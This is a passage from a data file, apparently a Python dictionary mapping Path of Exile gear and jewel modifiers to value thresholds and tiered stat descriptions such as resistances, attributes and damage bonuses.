"#% increased Rarity of Items found": [(30, '(10 - 11)% increased Rarity of Items found'), (60, '(12 - 13)% increased Rarity of Items found'), (90, '(14 - 15)% increased Rarity of Items found'), (120, '(16 - 17)% increased Rarity of Items found'), (145, '(18 - 20)% increased Rarity of Items found'), (200, '(1 - 3)% increased Quantity of Items found')],
"#% increased Stun and Block Recovery": [(30, '(10 - 12)% increased Stun and Block Recovery'), (60, '(13 - 15)% increased Stun and Block Recovery'), (90, '(16 - 18)% increased Stun and Block Recovery'), (110, '(19 - 21)% increased Stun and Block Recovery'), (130, '(22 - 25)% increased Stun and Block Recovery'), (160, '(14 - 15)% chance to Avoid being Stunned')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Mana Regenerated per second": [(0.53, '(22 - 24)% increased Mana Regeneration Rate'), (1.07, '(25 - 27)% increased Mana Regeneration Rate'), (3.33, '(28 - 30)% increased Mana Regeneration Rate')],
"#% of Physical Damage from Hits taken as Fire Damage": [(10, '(11 - 12) to Fire Resistance'), (20, '(13 - 14) to Fire Resistance'), (50, '(15 - 16) to Fire Resistance')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Power Charge on Kill')],
"#% reduced Elemental Ailment Duration on you": [(40, '(15 - 20)% reduced Elemental Ailment Duration on you'), (75, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you')],
"#% reduced Mana Reserved": [(6, 'Socketed Skill Gems get a 96% Mana Multiplier'), (12, 'Socketed Skill Gems get a 94% Mana Multiplier'), (30, 'Socketed Skill Gems get a 92% Mana Multiplier')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (1400, '(18 - 20)% increased Global Accuracy Rating'), (2000, '(18 - 20)% increased Global Accuracy Rating\n(150 - 250) to Accuracy Rating')],
"+# to Armour": [(40, '(15 - 20) to Armour'), (80, '(21 - 30) to Armour'), (110, '(31 - 40) to Armour'), (150, '(41 - 55) to Armour'), (200, '(56 - 70) to Armour'), (250, '(56 - 70) to Armour\n2% additional Physical Damage Reduction'), (1000, '(56 - 70) to Armour\n3% additional Physical Damage Reduction')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '(18 - 20) to Dexterity\n5% increased Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(35, '(15 - 20) to Evasion Rating'), (75, '(21 - 30) to Evasion Rating'), (105, '(31 - 40) to Evasion Rating'), (145, '(41 - 55) to Evasion Rating'), (195, '(56 - 70) to Evasion Rating'), (245, '(56 - 70) to Evasion Rating\n2 chance to Evade Attacks'), (1000, '(56 - 70) to Evasion Rating\n3 chance to Evade Attacks')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '(18 - 20) to Intelligence\n1 to Maximum Power Charges')],
"+# to Level of Socketed AoE Gems": [(2, '(2 - 3) to Quality of Socketed AoE Gems'), (5, '(4 - 6) to Quality of Socketed AoE Gems')],
"+# to Level of Socketed Aura Gems": [(3, '(2 - 3) to Quality of Socketed Aura Gems'), (5, '(4 - 6) to Quality of Socketed Aura Gems'), (10, '1 to Level of Socketed Aura Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Melee Gems": [(2, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems')],
"+# to Level of Socketed Minion Gems": [(2, 'Minions deal 8% increased Damage'), (4, 'Minions deal (9 - 10)% increased Damage'), (6, 'Minions deal (11 - 12)% increased Damage'), (8, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage\n1 to Level of Socketed Minion Gems')],
"+# to Level of Socketed Projectile Gems": [(2, '(2 - 3) to Quality of Socketed Projectile Gems'), (5, '(4 - 6) to Quality of Socketed Projectile Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '(18 - 20) to Strength\n5% increased Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 10) to maximum Energy Shield'), (75, '(11 - 14) to maximum Energy Shield'), (100, '(15 - 18) to maximum Energy Shield'), (125, '(19 - 23) to maximum Energy Shield'), (150, '(24 - 30) to maximum Energy Shield'), (175, '(24 - 30) to maximum Energy Shield\n(0.6 - 0.7)% of Energy Shield Regenerated per second'), (500, '(24 - 30) to maximum Energy Shield\n(0.8 - 0.9)% of Energy Shield Regenerated per second')],
"+# to maximum Life": [(100, '(8 - 10) to maximum Life'), (175, '(11 - 14) to maximum Life'), (250, '(15 - 19) to maximum Life'), (325, '(20 - 24) to maximum Life'), (400, '(25 - 30) to maximum Life\n4% increased maximum Life'), (1000, '(5 - 6)% increased maximum Life')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana\n6% increased maximum Mana'), (335, '(7 - 8)% increased maximum Mana'), (500, '(9 - 10)% increased maximum Mana')],
"+# to maximum number of Zombies": [(1, 'Minions deal 8% increased Damage'), (2, 'Minions deal (9 - 10)% increased Damage'), (5, 'Minions deal (11 - 12)% increased Damage\nZombies deal (30 - 35)% increased Damage\nSkeletons deal (30 - 35)% increased Damage')],
"+#% chance to Dodge Attack Hits while Focussed": [(65, '1% chance to Dodge Attack Hits'), (100, '2% chance to Dodge Attack Hits')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n1 to maximum Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n1 to maximum Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n1 to maximum Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Ignore all Movement Penalties from Armour": [(2, '4% increased Movement Speed'), (5, '(5 - 6)% increased Movement Speed')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Reflects # Physical Damage to Melee Attackers": [(10, 'Reflects (10 - 15) Physical Damage to Melee Attackers'), (20, 'Reflects (16 - 40) Physical Damage to Melee Attackers'), (30, 'Reflects (41 - 80) Physical Damage to Melee Attackers'), (1000, 'Reflects (41 - 80) Physical Damage to Melee Attackers\n(19 - 20) to Global Critical Strike Multiplier')],
"Socketed Attacks have +# to Total Mana Cost": [(20, '-1 to Total Mana Cost of Skills'), (40, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"Socketed Gems deal #% more Elemental Damage": [(40, '(13 - 14)% increased Elemental Damage'), (80, '(15 - 16)% increased Elemental Damage'), (150, '(17 - 19)% increased Elemental Damage')],
"Socketed Gems gain #% of Physical Damage as extra Lightning Damage": [(60, '(11 - 12)% increased Lightning Damage'), (110, '(13 - 14)% increased Lightning Damage'), (200, '(15 - 16)% increased Lightning Damage\nGain (3 - 5)% of Physical Damage as Extra Lightning Damage')],
"Socketed Gems have #% chance to Ignite": [(60, '(9 - 10)% chance to Ignite'), (110, '(11 - 12)% chance to Ignite'), (200, '(13 - 15)% chance to Ignite\nIgnites you inflict deal Damage (7 - 10)% faster')],
"Socketed Spells have #% reduced Mana Cost": [(25, '2% reduced Mana Cost of Skills'), (50, '3% reduced Mana Cost of Skills'), (100, '(4 - 5)% reduced Mana Cost of Skills')],
},
"Jewel": {
"#% chance to Avoid interruption from Stuns while Casting": [(55, '(6 - 7)% increased Stun and Block Recovery'), (100, '(8 - 10)% chance to Avoid interruption from Stuns while Casting')],
"#% chance to Ignite": [(7, '(1 - 2)% chance to Ignite'), (50, '3% chance to Ignite')],
"#% chance to Knock Enemies Back on hit": [(12, '(2 - 3)% increased Stun Duration on Enemies'), (50, '(2 - 3)% chance to Knock Enemies Back on hit')],
"#% chance to Poison on Hit": [(8, '(1 - 2)% chance to Poison on Hit'), (50, '3% chance to Poison on Hit')],
"#% chance to Shock": [(7, '(1 - 2)% chance to Shock'), (50, '3% chance to Shock')],
"#% chance to gain Onslaught when you use a Flask": [(26, '1% increased Attack and Cast Speed'), (50, '2% increased Attack Speed\n2% increased Cast Speed')],
"#% faster start of Energy Shield Recharge": [(15, '(3 - 4) to maximum Energy Shield'), (50, '0.2% of Energy Shield Regenerated per second')],
"#% increased Area Damage": [(30, '(1 - 2)% increased Area of Effect'), (100, '(3 - 5)% increased Area of Effect')],
"#% increased Armour": [(45, '(3 - 4)% increased Armour'), (100, '(5 - 6)% increased Armour')],
"#% increased Attack Speed": [(10, '1% increased Attack Speed'), (50, '2% increased Attack Speed')],
"#% increased Attack Speed while Dual Wielding": [(16, '(2 - 3)% increased Melee Damage'), (50, '(4 - 5)% increased Melee Damage\n2% increased Attack Speed')],
"#% increased Attack Speed while holding a Shield": [(16, '(2 - 3)% increased Melee Damage'), (50, '(4 - 5)% increased Melee Damage\n2% increased Attack Speed')],
"#% increased Attack Speed with Axes": [(20, '(1 - 2)% increased Attack Speed with Axes'), (50, '3% increased Attack Speed with Axes')],
"#% increased Attack Speed with Bows": [(20, '(1 - 2)% increased Attack Speed with Bows'), (50, '3% increased Attack Speed with Bows')],
"#% increased Attack Speed with Claws": [(20, '(1 - 2)% increased Attack Speed with Claws'), (50, '3% increased Attack Speed with Claws')],
"#% increased Attack Speed with Daggers": [(20, '(1 - 2)% increased Attack Speed with Daggers'), (50, '3% increased Attack Speed with Daggers')],
"#% increased Attack Speed with Maces": [(20, '(1 - 2)% increased Attack Speed with Maces'), (50, '3% increased Attack Speed with Maces')],
"#% increased Attack Speed with One Handed Melee Weapons": [(16, '(2 - 3)% increased Melee Damage'), (50, '(4 - 5)% increased Melee Damage\n2% increased Attack Speed')],
"#% increased Attack Speed with Staves": [(20, '(1 - 2)% increased Attack Speed with Staves'), (50, '3% increased Attack Speed with Staves')],
"#% increased Attack Speed with Swords": [(20, '(1 - 2)% increased Attack Speed with Swords'), (50, '3% increased Attack Speed with Swords')],
"#% increased Attack Speed with Two Handed Melee Weapons": [(16, '(2 - 3)% increased Melee Damage'), (50, '(4 - 5)% increased Melee Damage\n2% increased Attack Speed')],
"#% increased Attack Speed with Wands": [(20, '(1 - 2)% increased Attack Speed with Wands'), (50, '3% increased Attack Speed with Wands')],
"#% increased Attack and Cast Speed": [(10, '1% increased Attack Speed\n1% increased Cast Speed'), (50, '2% increased Attack Speed\n2% increased Cast Speed')],
"#% increased Burning Damage": [(50, '(2 - 3)% increased Burning Damage'), (100, '(4 - 5)% increased Burning Damage')],
"#% increased Cast Speed": [(10, '1% increased Cast Speed'), (50, '2% increased Cast Speed')],
"#% increased Cast Speed while Dual Wielding": [(11, '(1 - 2)% increased Cast Speed while Dual Wielding'), (50, '3% increased Cast Speed while Dual Wielding')],
"#% increased Cast Speed while holding a Shield": [(11, '(1 - 2)% increased Cast Speed while holding a Shield'), (50, '3% increased Cast Speed while holding a Shield')],
"#% increased Cast Speed while wielding a Staff": [(11, '(1 - 2)% increased Cast Speed while wielding a Staff'), (50, '3% increased Cast Speed while wielding a Staff')],
"#% increased Cast Speed with Cold Skills": [(11, '(2 - 3)% increased Cold Damage'), (50, '(4 - 5)% increased Cold Damage\n2% increased Cast Speed')],
"#% increased Cast Speed with Fire Skills": [(11, '(2 - 3)% increased Fire Damage'), (50, '(4 - 5)% increased Fire Damage\n2% increased Cast Speed')],
"#% increased Cast Speed with Lightning Skills": [(11, '(2 - 3)% increased Lightning Damage'), (50, '(4 - 5)% increased Lightning Damage\n2% increased Cast Speed')],
"#% increased Chaos Damage": [(35, '(2 - 3)% increased Chaos Damage'), (100, '(4 - 5)% increased Chaos Damage')],
"#% increased Cold Damage": [(42, '(2 - 3)% increased Cold Damage'), (100, '(4 - 5)% increased Cold Damage')],
"#% increased Critical Strike Chance for Spells": [(35, '(2 - 3)% increased Spell Damage'), (100, '(4 - 5)% increased Spell Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with Cold Skills": [(48, '(2 - 3)% increased Cold Damage'), (100, '(4 - 5)% increased Cold Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with Elemental Skills": [(35, '(2 - 3)% increased Elemental Damage'), (100, '(4 - 5)% increased Elemental Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with Fire Skills": [(48, '(2 - 3)% increased Fire Damage'), (100, '(4 - 5)% increased Fire Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with Lightning Skills": [(48, '(2 - 3)% increased Lightning Damage'), (100, '(4 - 5)% increased Lightning Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with One Handed Melee Weapons": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Critical Strike Chance with Two Handed Melee Weapons": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Damage": [(27, '2% increased Damage'), (100, '(3 - 4)% increased Damage')],
"#% increased Damage over Time": [(32, '(2 - 3)% increased Damage over Time'), (100, '(4 - 5)% increased Damage over Time')],
"#% increased Damage with Ailments": [(50, '(2 - 3)% increased Damage with Ailments'), (100, '(4 - 5)% increased Damage with Ailments')],
"#% increased Damage with Bleeding": [(50, '(2 - 3)% increased Damage with Bleeding'), (100, '(4 - 5)% increased Damage with Bleeding')],
"#% increased Damage with Poison": [(50, '(2 - 3)% increased Damage with Poison'), (100, '(4 - 5)% increased Damage with Poison')],
"#% increased Energy Shield Recharge Rate": [(20, '(3 - 4) to maximum Energy Shield'), (50, '0.2% of Spell Damage Leeched as Energy Shield')],
"#% increased Evasion Rating": [(45, '(3 - 4)% increased Evasion Rating'), (100, '(5 - 6)% increased Evasion Rating')],
"#% increased Fire Damage": [(42, '(2 - 3)% increased Fire Damage'), (100, '(4 - 5)% increased Fire Damage')],
"#% increased Global Accuracy Rating": [(32, '(21 - 35) to Accuracy Rating'), (100, '(36 - 50) to Accuracy Rating')],
"#% increased Global Critical Strike Chance": [(30, '2% increased Global Critical Strike Chance'), (100, '(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Global Defences": [(16, '(3 - 4)% increased Armour\n(3 - 4)% increased Evasion Rating\n(3 - 4) to maximum Energy Shield'), (50, '(5 - 6)% increased Armour\n(5 - 6)% increased Evasion Rating\n(5 - 6) to maximum Energy Shield')],
"#% increased Global Physical Damage": [(42, '(2 - 3)% increased Global Physical Damage'), (100, '(4 - 5)% increased Global Physical Damage')],
"#% increased Lightning Damage": [(42, '(2 - 3)% increased Lightning Damage'), (100, '(4 - 5)% increased Lightning Damage')],
"#% increased Mana Regeneration Rate": [(35, '(2 - 3) to maximum Mana'), (100, '(5 - 7)% increased Mana Regeneration Rate')],
"#% increased Melee Critical Strike Chance": [(35, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased Melee Damage": [(32, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage')],
"#% increased Melee Physical Damage while holding a Shield": [(36, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage')],
"#% increased Mine Damage": [(42, '(1 - 2)% increased Mine Laying Speed'), (100, '3% increased Mine Laying Speed')],
"#% increased Mine Laying Speed": [(20, '(1 - 2)% increased Mine Laying Speed'), (50, '3% increased Mine Laying Speed')],
"#% increased Physical Damage with Axes": [(42, '(3 - 4)% increased Physical Damage with Axes'), (100, '(5 - 6)% increased Physical Damage with Axes')],
"#% increased Physical Damage with Bows": [(42, '(3 - 4)% increased Physical Damage with Bows'), (100, '(5 - 6)% increased Physical Damage with Bows')],
"#% increased Physical Damage with Claws": [(42, '(3 - 4)% increased Physical Damage with Claws'), (100, '(5 - 6)% increased Physical Damage with Claws')],
"#% increased Physical Damage with Daggers": [(42, '(3 - 4)% increased Physical Damage with Daggers'), (100, '(5 - 6)% increased Physical Damage with Daggers')],
"#% increased Physical Damage with Maces": [(42, '(3 - 4)% increased Physical Damage with Maces'), (100, '(5 - 6)% increased Physical Damage with Maces')],
"#% increased Physical Damage with One Handed Melee Weapons": [(36, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage')],
"#% increased Physical Damage with Staves": [(42, '(3 - 4)% increased Physical Damage with Staves'), (100, '(5 - 6)% increased Physical Damage with Staves')],
"#% increased Physical Damage with Swords": [(42, '(3 - 4)% increased Physical Damage with Swords'), (100, '(5 - 6)% increased Physical Damage with Swords')],
"#% increased Physical Damage with Two Handed Melee Weapons": [(36, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage')],
"#% increased Physical Damage with Wands": [(42, '(3 - 4)% increased Physical Damage with Wands'), (100, '(5 - 6)% increased Physical Damage with Wands')],
"#% increased Physical Weapon Damage while Dual Wielding": [(36, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage')],
"#% increased Projectile Damage": [(30, '(1 - 2)% increased Projectile Speed'), (100, '(3 - 5)% increased Projectile Speed')],
"#% increased Projectile Speed": [(20, '(1 - 2)% increased Projectile Speed'), (50, '(3 - 5)% increased Projectile Speed')],
"#% increased Rarity of Items found": [(16, '(1 - 2)% increased Rarity of Items found'), (50, '(3 - 4)% increased Rarity of Items found')],
"#% increased Spell Damage": [(32, '(2 - 3)% increased Spell Damage'), (100, '(4 - 5)% increased Spell Damage')],
"#% increased Spell Damage while Dual Wielding": [(42, '(3 - 4)% increased Spell Damage while Dual Wielding'), (100, '(5 - 6)% increased Spell Damage while Dual Wielding')],
"#% increased Spell Damage while holding a Shield": [(42, '(3 - 4)% increased Spell Damage while holding a Shield'), (100, '(5 - 6)% increased Spell Damage while holding a Shield')],
"#% increased Spell Damage while wielding a Staff": [(42, '(3 - 4)% increased Spell Damage while wielding a Staff'), (100, '(5 - 6)% increased Spell Damage while wielding a Staff')],
"#% increased Stun Duration on Enemies": [(28, '(2 - 3)% increased Stun Duration on Enemies'), (100, '(4 - 5)% increased Stun Duration on Enemies')],
"#% increased Stun and Block Recovery": [(28, '(6 - 7)% increased Stun and Block Recovery'), (100, '(3 - 5)% chance to Avoid being Stunned')],
"#% increased Totem Damage": [(42, '(1 - 2)% increased Totem Placement speed'), (100, '3% increased Totem Placement speed')],
"#% increased Totem Life": [(30, 'Totems gain 3 to all Elemental Resistances'), (100, 'Totems gain (4 - 5) to all Elemental Resistances')],
"#% increased Trap Damage": [(42, '(1 - 2)% increased Trap Throwing Speed'), (100, '3% increased Trap Throwing Speed')],
"#% increased Trap Throwing Speed": [(20, '(1 - 2)% increased Trap Throwing Speed'), (50, '3% increased Trap Throwing Speed')],
"#% increased Weapon Critical Strike Chance while Dual Wielding": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased maximum Energy Shield": [(22, '(3 - 4) to maximum Energy Shield'), (50, '(5 - 6) to maximum Energy Shield')],
"#% increased maximum Life": [(17, '(3 - 4) to maximum Life'), (100, '(5 - 6) to maximum Life')],
"#% increased maximum Mana": [(20, '(2 - 3) to maximum Mana'), (50, '(4 - 5) to maximum Mana')],
"#% of Attack Damage Leeched as Life": [(0.8, '(3 - 4) to maximum Life'), (1.5, '0.2% of Attack Damage Leeched as Life')],
"#% of Damage taken gained as Mana over 4 seconds when Hit": [(7, '(2 - 3) to maximum Mana'), (20, '(5 - 7)% increased Mana Regeneration Rate')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.8, '(3 - 4) to maximum Energy Shield'), (1.67, '(5 - 6) to maximum Energy Shield')],
"#% of Life Regenerated per second": [(0.8, '(3 - 4) to maximum Life'), (1.67, '0.2% of Life Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(1.0, '(3 - 4) to maximum Life'), (5.0, '0.2% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(1.0, '(2 - 3) to maximum Mana'), (5.0, '0.1% of Physical Attack Damage Leeched as Mana')],
"#% reduced Mana Cost of Skills": [(11, '(2 - 3) to maximum Mana'), (50, '2% reduced Mana Cost of Skills')],
"#% reduced Physical Damage taken over time": [(4, '(-7 - -5) Physical Damage taken from Attacks'), (10, '(-10 - -8) Physical Damage taken from Attacks')],
"+# Energy Shield gained for each Enemy hit by your Attacks": [(5, '(3 - 4) to maximum Energy Shield'), (20, '(1 - 2) Energy Shield gained for each Enemy hit by your Attacks')],
"+# Life gained for each Enemy hit by your Attacks": [(7, '(3 - 4) to maximum Life'), (50, '(1 - 2) Life gained for each Enemy hit by your Attacks')],
"+# Mana gained for each Enemy hit by your Attacks": [(5, '(2 - 3) to maximum Mana'), (20, '1 Mana gained for each Enemy hit by your Attacks')],
"+# to Armour if you've Hit an Enemy Recently": [(800, '(3 - 4)% increased Armour'), (2000, '(5 - 6)% increased Armour')],
"+# to Dexterity": [(42, '(2 - 3) to Dexterity'), (100, '(4 - 5) to Dexterity')],
"+# to Dexterity and Intelligence": [(27, '(2 - 3) to Dexterity\n(2 - 3) to Intelligence'), (100, '(4 - 5) to Dexterity\n(4 - 5) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(800, '(3 - 4)% increased Evasion Rating'), (2000, '(5 - 6)% increased Evasion Rating')],
"+# to Intelligence": [(42, '(2 - 3) to Intelligence'), (100, '(4 - 5) to Intelligence')],
"+# to Strength": [(42, '(2 - 3) to Strength'), (100, '(4 - 5) to Strength')],
"+# to Strength and Dexterity": [(27, '(2 - 3) to Strength\n(2 - 3) to Dexterity'), (100, '(4 - 5) to Strength\n(4 - 5) to Dexterity')],
"+# to Strength and Intelligence": [(27, '(2 - 3) to Strength\n(2 - 3) to Intelligence'), (100, '(4 - 5) to Strength\n(4 - 5) to Intelligence')],
"+# to all Attributes": [(20, '(2 - 3) to Strength\n(2 - 3) to Dexterity\n(2 - 3) to Intelligence'), (50, '(4 - 5) to Strength\n(4 - 5) to Dexterity\n(4 - 5) to Intelligence')],
"+#% Chance to Block Attack Damage while Dual Wielding": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(4 - 6) Life gained when you Block')],
"+#% Chance to Block Attack Damage while holding a Shield": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(4 - 6) Life gained when you Block')],
"+#% Chance to Block Attack Damage while wielding a Staff": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(4 - 6) Life gained when you Block')],
"+#% Chance to Block Spell Damage while Dual Wielding": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(3 - 5) Mana gained when you Block')],
"+#% Chance to Block Spell Damage while holding a Shield": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(3 - 5) Mana gained when you Block')],
"+#% Chance to Block Spell Damage while wielding a Staff": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(3 - 5) Mana gained when you Block')],
"+#% to Chaos Resistance": [(100, '(2 - 3) to Chaos Resistance')],
"+#% to Cold Resistance": [(35, '(2 - 3) to Cold Resistance'), (100, '(4 - 5) to Cold Resistance')],
"+#% to Cold and Lightning Resistances": [(34, '(2 - 3) to Cold Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Cold Resistance\n(4 - 5) to Lightning Resistance')],
"+#% to Critical Strike Multiplier for Spells": [(35, '(2 - 3)% increased Spell Damage'), (100, '(4 - 5)% increased Spell Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier while Dual Wielding": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with Cold Skills": [(48, '(2 - 3)% increased Cold Damage'), (100, '(4 - 5)% increased Cold Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with Elemental Skills": [(35, '(2 - 3)% increased Elemental Damage'), (100, '(4 - 5)% increased Elemental Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with Fire Skills": [(48, '(2 - 3)% increased Fire Damage'), (100, '(4 - 5)% increased Fire Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with Lightning Skills": [(48, '(2 - 3)% increased Lightning Damage'), (100, '(4 - 5)% increased Lightning Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with One Handed Melee Weapons": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with Two Handed Melee Weapons": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4) to Global Critical Strike Multiplier')],
